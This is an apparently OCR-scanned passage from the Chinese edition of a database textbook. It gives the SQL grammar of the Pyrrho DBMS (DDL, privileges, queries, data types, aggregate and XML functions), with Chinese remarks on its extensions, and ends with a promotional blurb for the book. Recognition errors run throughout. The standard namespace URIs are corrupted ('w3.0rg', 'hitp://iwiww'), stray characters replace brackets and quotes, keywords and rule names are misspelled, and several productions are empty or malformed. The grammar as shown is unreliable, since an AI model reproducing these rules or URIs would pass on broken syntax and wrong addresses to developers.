SearchCondition ")'. 


XMLOption = WITH XMLNAMESPACES ‘( XMLNDec {', XMLNDec } ) . 
XMLNDec = (string AS id) | (DEFAULT string) | (NO DEFAULT). 


下 列 标准 名 空间 和 前 缀 为 预定 义 的 : 


http://www.w3.0rg/1999/02/22-7rdf-syntax-ns#’" AS rdf 
http://www.w3.0reg/2000/01/rdf-schema#" AS rdfs 
http://wiww.w3.0rg/2001/XMLSchema#’ AS xsd 
hitp://iwiww.w3.0rg/2002/07/o0wl#’ AS ow! 


AlterTable = TO id 

| ADD ColumnDefinition 

| ALTER [COLUMN] id AlterColumn { ',’ AlterColumn } 

| DROP [COLUMN] id DropAction 

| (ADD|DROP) (TableConstraintDef | VersioningClause) 
| ADD TablePeriodDefinition [AddPeriodColumnList] 
| AlterCheck 
| [ADD|DROP] Metadata . 


AlterColumn = IO id 
| POSITION int 
| (SET|DROP) ColumnConstraint 
| AlterDomain 
| GenerationRule 
| Metadata. 


TO id 
ADD ( Member | Method ) 


AlterType = 

| 

| DROP ( Member_ id | Routine) 
| 

| 

| 


Representation 
Metadata 
ALTER Member_id AlterMember { ',’ AlterMember }. 


Member = id Type [DEFAULT Value] Collate . 
AlterMember = TO id 


| Metadata 
| TYPE Type 
| SET DEFAULT Value 
| DROP DEFAULT. 
AlterView = SET (INSERT|UPDATE|DELETE|) TO SqlStatement 
| SET SOURCE TO QueryExpression 
| TO id 
| Metadata . 
Metadata = ATTRIBUTE | CAPTION | ENTITY | HISTOGRAM | 


LINE | POINTS | PIE | SERIES | X | Y | string | iri. 
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标志 和 “约束 ” 串 都 是 Pyrrho 的 表达 式 。 实 体 和 属性 影响 XML 的 输出 ， 而 其 他 标志 
影响 HTML 的 输出 。 串 是 在 角色 中 的 对 象 文档 。 


AddPeriodColumnList = ADD [COLUMN] Start_ ColumnDefinition ADD 
[COLUMN] End_ColumnDefinition . 


CreateClause = CREATE ROLE id [Description_string] 


| CREATE DOMAIN id [AS] DomainDefinition 

| CREATE FUNCTION id ‘“( Parameters ') RETURNS Type 
Statement 

| CREATE ORDERING FOR UDType_id (EQUALS ONLY| 
ORDER FULL) BY Ordering 

| CREATE PROCEDURE id “( Parameters ') Statement 

| CREATE Method Body 

| CREATE TABLE id TableContents [UriType] {Metadata} 

| CREATE TEMPORAL VIEW id AS [TABLE]| id WITH 
KEY Cols 

| CREATE TRIGGER id (BEFORE |AFTER) Event ON id 
[ RefObj ] Trigger 

| CREATE TYPE id [UNDER id] [Representation] [ Method 
{', Method} ] 

| CREATE ViewDefinition 

| CREATE XMLNAMESPACES XMLNDec { ', XMLNDec }. 


Representation = (StandardType|Table id|"( Member {', Member }')') 
[UriType] {CheckConstraint} . 


UriType = [Abbrev id]' ~ ~*( [Namespace_id] : id | uri ). 


UriType 的 语法 属 Pyrrho 的 扩展 。Abbrev_id 仅 能 通过 一 个 CREATE DOMAIN 语句 提 
供 , 参见 7.2.2 节 。 


DomainDefinition = StandardType [UriType] [DEFAULT Default] 
{ CheckConstraint } Collate . 
Ordering = (RELATIVE| MAP) WITH Routine 
| STATE . 


TableContents = ( TableClause {，TableClause } ){ VerisoningClause } 
| OF Type_id ['( TypedTableElement {", TypedTableFElement} ")] 
| AS Subquery . 


VersioningClause = WITH (SYSTEM |APPLICATION) VERSIONING . 

WITH APPLICATION VERSIONING 是 Pyrrho 专 有 的 。 

TableClause = ColumnDefinition {Metadata} | TableConstraint | 
TablePeriodDefinition . 


ColumnDefinition = ld Type [DEFAULT Default {ColumnConstraint |Check 
Constraint} Collate 
| id GenerationRule 
| id Table_id ‘.’ Column _id. 


最 后 一 种 形式 是 查看 表 的 简化 版 ， 例 如 a.b 的 域 为 int， 那 么 a.b 就 是 int check (value in 
(selectb from a)) 的 缩写 。 
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GenerationRule = GENERATED ALWAYS AS ‘(Value’) [UPDATE “( 
Assignments ')'] 
| GENERATED ALWAYS AS ROW (START|NEXT|END). 
此 名 中 第 一 行 可 选 的 更 新 子 句 是 Pyrrho 的 创新 。 第 二 行 是 SQL:2011 新 引入 的 ， 表 示 一 
个 新 行 的 开始 时 间 起 初 是 当前 时 间 ， 交 付 时 改 为 系统 (事务) 时 间 。NEXT 是 Pyrrho 为 时 序 
表 新 增加 的 ， 它 为 动态 的 ， 受 其 他 行 变动 的 影响 。 


ColumnConstraint = [CONSTRAINT id ] ColumnConstraintDef . 


ColumnConstraintDef = NOT NULL 
| PRIMARY KEY 
| REFERENCES id [ Cols ] [USING Values] { ReferentialAction } 
| UNIQUE . 

TableConstraint = [ CONSTRAINT id ] TableConstraintDef . 


TableConstraintDef= UNIQUE Cols 
| PRIMARY KEY Cols 
| FOREIGN KEY Cols REFERENCES Table id [ Cols ] 
{ ReferentialAction }. 


TablePeriodDefinition= PERIOD FOR PeriodName ‘( Column_id ', Column_id ").. 
PeriodName = SYSTEM_TIME | id. 


TypedTableElement = ColumnOptionsPart | TableCnstraint . 


ColumnOptionsPart = id WITH OPTIONS “( ColumnOption {， 
ColumnOption } ). 


ColumnOption = (SCOPE Table_id) | (DEFAULT Value) | ColumnConstraint. 
Values = Value， Value } 人. 
Cols = id 65 | (POSITION'Y: 
ReferentialAction = ON (DELETE|UPDATE) (CASCADE | SET 
DEFAULT |RESTRICT). 


ViewDefinition = VIEW id AS QueryExpression [UPDATE SqlStatement] 
[INSERT SqlStatement] [DELETE SqlStatement] {Metadata}. 


这 是 对 SQL:2011 语法 的 扩充 ， 目 的 是 提供 访问 间接 表 更 简单 的 机 制 。 所 有 这 些 都 能 用 
Web 服务 访问 远程 数据 。 

Event = INSERT | DELETE | (UPDATE [OFid{ id}]). 

RefObj = REFERENCING { (OLDINEW)[ROW|ITABLE][AS] id } . 


Trigger = FOR EACH ROW [TriggerCond ] (Call | (BEGIN ATOMIC 
Statements END)) . 


TriggerCond = WHEN (SearchCondition ")” . 


DropClause = DROP DropObject DropAction . 
DropObject = “ROLE id 

| TRIGGER id 

| ORDERING FOR id 

| ObjectName 

| 


XMLNAMESPACES (id|DEFAULT) {，(id|DEFAULT) } . 
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DropAction = | RESTRICT | CASCADE . 
Rename = SET ObjectName TO id ， 


Grant = GRANT Privileges TO GranteeList [ WITH GRANT OPTION ] 
| GRANT Role id {',’ Role id } TO GranteeList [ WITH 
ADMIN OPTION ]. 


Revoke = REVOKE [GRANT OPTION FOR] Privileges FROM 
GranteeList 
| REVOKE [ADMIN OPTION FOR] Role id { Role id } 
FROM GranteeList . 
Privileges = ObjectPrivileges ON ObjectName. 
ObjectPrivileges = ALL PRIVILEGES | Action {', Action } . 
Action = SELECT[ ‘(id{',id}")] 
| DELETE 
| INSERT[ ‘(id{‘’id}")] 
| UPDATE[ ‘(id{',id}")] 
| REFERENCES [id{f id 人] 
| USAGE 
| TRIGGER 
| EXECUTE 
| OWNER. 


ObjectName = TABLE id 
| DOMAIN id 
| TYPE id 
| Routine 
| VIEW id 
| DATABASE. 


GranteeList = PUBLIC | Grantee{ ',’ Grantee }. 


Grantee = [USER] id 
| ROLE id . 
关于 在 Pyrrho 中 角色 的 使 用 参见 7.6 节 。 
Routine = PROCEDURE id [CType, {, Type })"] 


| FUNCTION id [‘(‘Type, {', Type }")'] 
| [MethodType] METHOD id ['(Type, {',’ Type })] [FOR id ] 
| TRIGGER id . 


Type = (StandardType | DefinedType | Domain_id | Type_id)[UriType]. 


StandardType = BooleanType | CharacterType | FloatType | IntegerType | 
LobType | NumericType | DateTimeType | IntervalType | 
XMLIype . 


BooleanType = BOOLEAN. 


CharacterType = (([INATIONAL]CHARACTER) | CHAR | NCHAR | VARCHAR) 
[VARYING] [int 9] [CHARACTER SET id ] Collate . 


Collate = [COLLATE id]. 
LobType = BLOB | CLOB | NCLOB . 


NCHAR 默默 地 改 为 CHAR，NCLOB 改 为 CLOB。COLLATE UNICODE 是 默认 的 。 
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FloatType = (FLOAT|REAL) ['(int',"int’)’] . 

IntegerType = INT | INTEGER. 

NumericType = (NUMERIC|DECIMAL|DEC) [(int,"int')]. 

DateTimeType = (DATE | TIME | TIMESTAMP) ([IntervalField [ TO 
IntervalField ]] | [‘( int )"]). 

使 用 IntervalField 定义 DateTimeType 是 对 SQL 标准 的 扩充 。 


IntervalType = INTERVAL IntervalField [ TO IntervalField ] . 


IntervalField = YEAR | MONTH | DAY | HOUR | MINUTE | SECOND 
[Cint )]. 


XMLIype = XML . 
DefinedType = (ROW|TABLE) Representation 
| Type ARRAY 
| Type MULTISET. 
Insert = INSERT [WITH PROVENANCE string] [XMLOption] 


INTO Table_id [ Cols ] Value . 


UpdatePositioned = UPDATE [XMLOPption] Table id Assignment WHERE 
CURRENT OF Cursor id ， 


UpdateSearched = UPDATE [XMLOPption] Table_id Assignment [WhereClause] . 


DeletePositioned = DELETE [XMLOPption] FROM Table id WHERE 
CURRENT OF Cursor_id. 


DeleteSearched = DELETE [XMLOPtion] FROM Table id [ WhereClause] . 
CursorSpecification = [XMLOPption ] QueryExpression . 


QueryExpression = QueryExpressionBody [OrderByClause] 
[FetchFirstClause] . 


QueryExpressionBody = QueryTerm 
| QueryExpression ( UNION | EXCEPT )[ ALL | DISTINCT] 
QueryTerm . 


QueryTerm = QueryPrimary | QueryTerm INTERSECT [ALL | DISTINCT ] 
QueryPrimary . 

QueryPrimary = QuerySpecification | Value | TABLE id . 

QuerySpecification = SELECTT{[ ALL | DISTINCT ] SelectList TableExpression. 

SelectList = '“# | SelectItem { ',’ SelectItem }. 


SelectItem = Value [AS id ] . 


TableExpression = FromClause [ WhereClause ] [ GroupByClause ] 
[ HavingClause ] [WindowClause] . 


FromClause = FROM TableReference { ', TableReference } . 

WhereClause = WHERE BooleanExpr . 

GroupByClause = GROUP BY [DISTINCT|ALL] GroupingSet {',’ GroupingSet}. 
GroupingSet = OrdinaryGroup | RollCube | GroupingSpec | (7 


OrdinaryGroup = ColumnRef [Collate] | ( ColumnRef [Collate] { ',” 
ColumnRef [Collate] 上 ， 
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RollCube = (ROLLUP|CUBE) ‘( OrdinaryGroup { ', OrdinaryGroup } 小 . 
GroupingSpec = GROUPING SETS ‘( GroupingSet { ',’ GroupingSet } )". 
HavingClause = HAVING BooleanExpr . 
WindowClause = WINDOW WindowDef { ‘, WindowDef }. 
WindowDef = id AS ‘(‘ WindowDetails )’. 
WindowDetails = [Window _id] [PartitionClause] [OrderByClause] 

[ WindowFrame]. 
PartitionClause = PARTITION BY OrdinaryGroup . 
WindowFrame = (ROWS | RANGE) (WindowStart| WindowBetween) [Exclusion]. 
WindowStart = ((Value | UNBOUNDED) PRECEDING) | (CURRENT ROW). 
WindowBetween = BETWEEN WindowBound AND WindowBound. 
WindowBound = WindowStart | ((Value | UNBOUNDED) FOLLOWING ). 
Exclusion = EXCLUDE ((CURRENT ROW)|GROUPI|TIES|(NO OTHERS)). 


TableReference = TableFactor Alias | JoinedTable 
| TableReference FOLD | TableReference INTERLEAVE 
WITH QueryPrimary. 


TableFactor = Table id [FOR SYSTEM_TIME [TimePeriodSpecification]] 
| View _id 

| ROWS ‘(: int [int]9 

| Table_FunctionCall 

| Subquery 

| (TableReference 人) 

| TABLE (Value 小 

| UNNEST (Value 小 

| XMLTABLE ( [XMLOption] xml [PASSING NamedValue 
{', NamedValue}] XmlColumns 小 . 


ROWS(..) 是 Pyrrho (对 表 和 cell 日 志 ) 的 扩展 。 


Alias = [[AS] id [ Cols ]]. 
Subquery = (QueryExpresslon ) . 
TimePeriodSpecification = AS OF Value 


| BETWEEN [ASYMMETRIC|SYMMETRIC] Value AND Value 
| FROM Value TO Value. 


JoinedTable = TableReference CROSS JOIN TableFactor 
| TableReference NATURAL [JoinType] JOIN TableFactor 
| TableReference [JoinType] JOIN TableFactor USING 
‘(‘Cols’) [TO ‘(Cols’)’] 
| TableReference TEMPORAL [[AS] id] JOIN TableFactor 
| TableReference [JoinType] JOIN TableReference ON 
SearchCondition . 


JoinType = INNER | ( LEFT | RIGHT | FULL ) [OUTERI] . 
SearchCondition = BooleanExpr . 

OrderByClause = ORDER BY OrderSpec { ‘, OrderSpec }. 
OrderSpec = Value [ ASC | DESC ] [ NULLS ( FIRST | LAST )] . 
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FetchFirstClause = FETCH FIRST [ int ] (ROW|ROWS) ONLY . 
XmlColumns = COLUMNS XmlColumn { ', XmlColumn }. 
XmlColumn = id Type [ DEFAULT Value ] [ PATH str ]. 


Value = Literal 
| Value BinaryOp Value 

| 一 Value 

| Value 小 

| Value Collate 

| Value {' Value 了 

| ColumnRef 

| VariableRef 

| (SYSTEM_TIME | Period id |(PERIOD’(‘Value,Value’)’)) 
| VALUE 

| ROW 

| Value Member id 

| MethodCall 

| NEW MethodCall 

| FunctionCall 

| VALUES (Value {', Value }) {', (‘Value {',’ Value 六 他 
| Subquery 

| (MULTISET | ARRAY | ROW) (Value {，Value }) 
| TABLE ‘( Value’) 

| TREAT (Value AS Sub Type) 

| CURRENT_USER 

| CURRENT ROLE 

| HTTP GET url_Value [AS mime_string]. 


BinaryOp = ‘+ | | ** | | | | MultisetOp. 
VariableRef = {Scope_ id “.’ } Variable_id. 


ColumnRef = [TableOrAlias 1d “.] Column_id 
| TableOrAlias id (POSITION| NEXT | LAST) . 


MultisetOp = MULTISET (UNION | INTERSECT | EXCEPT(ALL | 
DISTINCT). 
Literal = int 
| float 
| string 
| TRUE | FALSE 
| XX ” {hexit} ™ 
| id 人 人 (Domain id|Type_id|[Namepsace_idJ':"id|uri) 
| DATE date_string 
| TIME time_string 
| TIMESTAMP timestamp_string 
| INTERVAL ['-"] interval_string IntervalQualifier. 


IntervalQualifier = StartField TO EndField 
| DateTimefField. 


StartField = IntervalField [“(" int’)’]. 
EndField = IntervalField | SECOND [‘(int’)]. 
DateTimeField = StartField | SECOND [Gint [', int])’]. 
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这 里 的 整数 表示 整 秒 数 或 秒 的 小 数 部 分 的 精度 。 


IntervalField = YEAR | MONTH | DAY | HOUR | MINUTE . 
BooleanExpr = BooleanTerm | BooleanExpr OR BooleanTerm . 
BooleanTerm = BooleanFactor | Boolean Term AND BooleanFactor . 
BooleanFactor = [NOT] BooleanTest . 

BooleanTest = Predicate | (BooleanExpr ”| Boolean_Value . 


Predicate = Any | At | Between | Comparison | Contains | Current | Every | Exists | 
In | Like | Member | Null | Of | PeriodBinary | Similar | Some | Unique. 


Any = ANY '( [DISTINCT |ALL] Value) ) FuncOpt.. 
At = ColumnRef AT Value . 


Between = Value [NOT] BETWEEN [SYMMETRIC|ASYMMETRIC] Value 
AND Value. 


Comparison = Value CompOp Value . 

CompOp = =' | <>’|'<’|'>’|'<=’|'>=’. 

Contains = PeriodPredicand CONTAINS (PeriodPredicand | DateTime_Value). 
Current = CURRENT ( ColumnRef ). 


Current 和 At 两 类 谓词 可 用 作 时 序 表 的 时 间 列 的 默认 值 。 

Every = EVERY '( [DISTINCT |ALL] Value) ) FuncOpt. 

Exists = EXISTS QueryExpression . 

FuncOpt = [FILTER ‘( WHERE SearchCondition ")] [OVER WindowSpec] . 
In = Value [NOT] IN ‘( QueryExpression | (Value{ Value } ) 了 . 
Like = Value [NOT] LIKE string . 

Member = Value [ NOT ] MEMBER OF Value . 

Null = Value IS [INOT] NULL . 

Of = Value IS [NOT] OF “( [ONLY] Type {',[ONLY] Type 上 了) . 
Similar = Value [ NOT ] SIMILAR TO Regex_Value [ ESCAPE char ]. 
Some = SOME ( [DISTINCT |ALL] Value) ”FuncOPpt . 

Unique = UNIQUE QueryExpression . 


PeriodBinary = PeriodPredicand (OVERLAPS|EQUALS|[IMMEDIATELY] 
(PRECEDES|SUCCEEDS) PeriodPredicand . 


FunctionCall = NumericValueFunction | StringValueFunction | 
DateTimeFunction | SetFunctions | XMLFunction | 
UserFunctionCall | MethodCall . 


NumericValueFunction = AbsoluteValue | Avg | Cast | Ceiling | Coalesce | 
Correlation | Count | Covariance | Exponential | 
Extract | Floor | Grouping | Last | 
LengthExpression | Maximum | Minimum | 
Modulus | NaturalLogarithm | Next | Nullif | 
Percentile | Position | PowerFunction | Rank | 


Regression | RowNumber | SquareRoot | 
StandardDeviation | Sum | Variance ， 


AbsoluteValue = ABS (Value ) . 

Avg = AVG '( [DISTINCTIALL] Value) )’ FuncOpt . 
Cast = CAST (Value AS Type ) . 

Ceiling = (CEIL|CEILING) (Value 小 . 

Coalesce = COALESCE (Value {', Value } 路 
Corelation = CORR (Value ‘, Value ') FuncOpt. 


Count = COUNT ( *") 
| COUNT ( [DISTINCTIALL] Value) )” FuncOPt . 


Covariance = (COVAR_POP|COVAR_SAMP) (Value ，Value ") FuncOpt. 
WindowSpec = Window id | ‘( WindowDetails ) . 

Exponential = EXP (Value ) ， 

Extract = EXTRACT ‘(' ExtractField FROM Value '). 

ExtractField = YEAR | MONTH | DAY | HOUR | MINUTE | SECOND. 
Floor = FLOOR (Value '). 

Grouping = GROUPING ( ColumnRef {', ColumnRef } )》 

Last = LAST [( ColumnRef ') OVER WindowSpec ] . 


LengthExpression = (CHAR LENGTH|CHARACTER LENGTH|OCTET_ 
LENGTH) “( Value 小 . 


Maximum = MAX '( [DISTINCT|ALL] Value) ) FuncOPpt . 
Minimum = MIN ‘(‘ [DISTINCT|ALL] Value) ) FuncOPpt . 
Modulus = MOD (Value ，Value ) . 

NaturalLogarithm = LN (Value ) . 

Next = NEXT ['( ColumnRef ') OVER WindowSpec ] . 
Nullif = NULLIF (Value ‘, Value ) . 


Percentile = (PERCENTILE CONT|PERCENTILE DISC) (Value 小 
WithinGroup . 


WithinGroup = WITHIN GROUP ( OrderByClause ) . 
Position = POSITION ['(Value IN Value ")']. 
PowerFunction = POWER ‘( Value “, Value ) . 


Rank = (CUME DIST|DENSE RANK|PERCENT RANK|RANK) (’) OVER 
WindowSpec| (DENSE RANK|PERCENT RANK|RANK|CUME 
DIST) (Value {', Value } ) WithinGroup . 


Regression = (REGR_SLOPE|REGR_INTERCEPT|REGR_COUNT|REGR R2| 
REGR AVVGX| REGR AVGY|REGR SXX|REGR SXY| 
REGR_SYY) ( Value ,Value ) FuncOPt . 


RowNumber = ROW_NUMBER ‘(*) OVER WindowSpec . 
SquareRoot = SQRT (Value ) . 
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StandardDeviation = (STDDEV_POP|STDDEV_SAMP) ‘( [DISTINCT|ALL] 
Value) ) FuncOpt. 


Sum = SUM '( [DISTINCT |ALL] Value) ) FuncOPpt . 
Variance = (VAR POP|VAR SAMP) ‘( [DISTINCT|ALL] Value) )’ FuncOpt. 


DateTimeFunction = CURRENT _DATE | CURRENT_TIME | LOCALTIME | 
CURRENT TIMESTAMP | LOCALTIMESTAMP . 


StringValueFunction = Normalize | Substring | RegularSubstring | Fold | 
Trim | XmlAgg . 


Normalize= NORMALIZE (Value ) . 

Substring = SUBSTRING (Value FROM Value [ FOR Value ] ) . 

Fold = (UPPER|LOWER) (Value ) 

Trim = TRIM ‘“([[LEADING|TRAILING|BOTH I] [character] FROM] Value ').. 
XmlAgg = XMLAGG (Value ) . 

SetFunction = Cardinality | Collect | Element | Fusion | Intersect | Set . 
Collect = COLLECT '( [DISTINCTIALL] Value) ) FuncOpt. 

Fusion = FUSION ( [DISTINCTIALL] Value) )》 FuncOpt . 

Intersect = INTERSECT “( [DISTINCTIALL] Value) 》 FuncOPt . 
Cardinality = CARDINALITY (Value ) . 

Element = ELEMENT (Value ) . 

Set = SET '( Value ) . 


Assignment = SET Target =’ Value {', Target = "Value } 
| SET “(Target { '," Target } ') ‘="’ Value. 

Target = 过 所 

SQL:2003 标准 不 支持 直接 包含 参数 表 的 目标 。 

Call = CALL Procedure id ( [Value {', Value } ] ) 
| MethodCall . 


CaseStatement = CASE Value { WHEN Value THEN Statements } 
[ ELSE Statements ] END CASE 


| CASE { WHEN SearchCondition THEN Statements } 
[ ELSE Statements ] END CASE . 
上 面 的 语句 中 至 少 要 有 一 个 WHEN 子 句 。 
Close = CLOSE id . 
CompoundStatement = Label BEGIN [XMLDec] Statements END . 
XMLDec = DECLARE Namespace ';'. 


Declaration = “DECLARE id{ ，id } Type 
| DECLARE id CURSOR FOR QueryExpression 
[FOR UPDATE [OF Cols ]] 
| DECLARE HandlerType HANDLER FOR ConditionList 
Statement . 


HandlerType = CONTINUE | EXIT | UNDO. 


有 附录 巨 经 时 级 RDBMS，Pyrrpo 简介 


ConditionList = Condition {', Condition } . 


Condition = Condition id | SQLSTATE string | SQLEXCEPTION | 
SQLWARNING | (NOT FOUND) . 
Fetch = FETCH Cursor_id INTO VariableRef { ，VariableRef } . 


ForStatement = Label FOR|{ For id AS J][id CURSOR FOR ] QueryExpression 
DO Statements END FOR [Label 1d]. 


IfStatement = IF BooleanExpr THEN Statements { ELSEIF BooleanExpr 
THEN Statements } [ ELSE Statements ] END IF . 

Label = [label : ] . 

LoopStatement = Label LOOP Statements END LOOP . 

Open = OPEN id . 

Repeat = Label REPEAT Statements UNTIL BooleanExpr END 
REPEAT . 

SelectSingle = QueryExpresion INTO VariableRef { ，VariableRef } . 

Statements = Statement { Statement } . 

While = Label WHILE SearchCondition DO Statements END WHILE . 


UserFunctionCall = Id ‘([ Value {',’ Value}] ). 


MethodCall = “Value ‘.’ Method id [“( [Value {', Value } ] 9 
| (Value AS Type 了 Method id [ “(‘ [Value {', Value } ] )"] 
| Type’:: Method id [人 [Value{ Value }] ) ]. 


XMLFunction = XMLComment | XMLConcat | XMLElement | XMLForest | 
XMLParse | XMLProc | XMLRoot | XMLAgg | XPath . 
XPath 不 在 SQL:2003 标准 中 ,但 已 非常 流行 ， 参 见 30.3.4 节 。 


XMLComment = XMLCOMMENT ‘( Value ). 
XMLConcat = XMLCONCAT (Value {',’ Value } )'. 


XMLElement = XMLELEMENT (NAME id [', Namespace ] 
[， AttributeSpec ]{ ', Value 上 . 


Namespace = XMLNAMESPACES ‘( NamespaceDefault |( string AS id {” 
string AS id }) 小 . 

NamespaceDefault = (DEFAULT string) | (NO DEFAULT). 

AttributeSpec = XMLATTRIBUTES ‘( NamedValue {',’ NamedValue })'. 

NamedValue = Value [ AS id ]. 

XMLForest = XMLFOREST ( [Namespace ',] NamedValue {，NamedValue }).. 

XMLParse = XMLPARSE ( CONTENT Value 小 . 

XMLProc = XMLPI ‘( NAME id [，Value ] 小. 

XMLForest = XMLFOREST ([Namespace ,] NamedValue {，NamedValue }).. 

XMLParse = XMLPARSE '( CONTENT Value 小 . 

XMLProc = XMLPI (NAME id [Value ] 小 . 

XMLQuery = XMLQUERY '( Value, xpath_xml '). 

XMLText = XMLITEXT( xml ') . 


XMLValidate = XMLVALIDATE'( (DOCUMENT|CONTENT|SEQUENCE) 
Value "). 
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本 书 是 数据 库 领域 的 经 典 畅 销 著作 ， 被 世界 多 所 大 学 选 为 教材 ， 同 时 被 广大 技术 人 员 和 管理 人 员 
视 为 必 读 书 。 本 书 作者 曾 在 工业 界 致 力 于 数据 库 系 统 的 设计 ， 后 进入 学 术 界 精 耕 于 教学 ， 深 语 专 业 人 
士 和 非 专 业 人 士 在 使 用 和 学 习 数 据 库 时 的 痛 点 。 因 此 ， 本 书 采 用 这 两 类 读者 都 易于 接受 和 理解 的 方 
式 ， 全 面 介绍 数据 库 设 计 、 实 现 和 管理 的 基本 理论 、 方 法 和 技术 。 

本 书 中 文 版 分 为 “基础 篇 ”和 “ 进 阶 篇 ”， 分 别 对 应 原 书 第 一 ~ 五 部 分 和 第 六 ~ 九 部 分 ， 本 书 为 
进 阶 篇 。 


本 书 特色 


e 方法 与 案例 。 继 续 使 用 DreamHome 案 例 来 介绍 分 布 式 数据 库 、 对 象 数据 库 和 商务 智能 技术 ， 使 
学 生 能 从 熟悉 的 关系 数据 库 系 统 自然 、 清 晰 地 过 渡 到 接受 新 技术 。 

e 更 新 与 升级 。 第 31 章 增加 了 “数据 仓库 与 时 态 数 据 库 ” 的 内 容 ; 修订 了 第 26 章 “复制 与 移动 数 
据 库 ”; 修改 了 第 八 部 分 关于 Web=DBMS 集 成 和 XML 的 章节 。 

e 形式 与 风格 。 每 章 都 采用 清晰 易 懂 的 表述 方法 ， 开 篇 明确 给 出 学 习 目标 ， 章 中 每 一 则 定义 都 用 
特殊 格式 突出 显示 ， 通 篇 使 用 大 量 示例 和 图 表 来 说 明 问题 ， 最 后 给 出 小 结 ， 并 配 有 练习 。 
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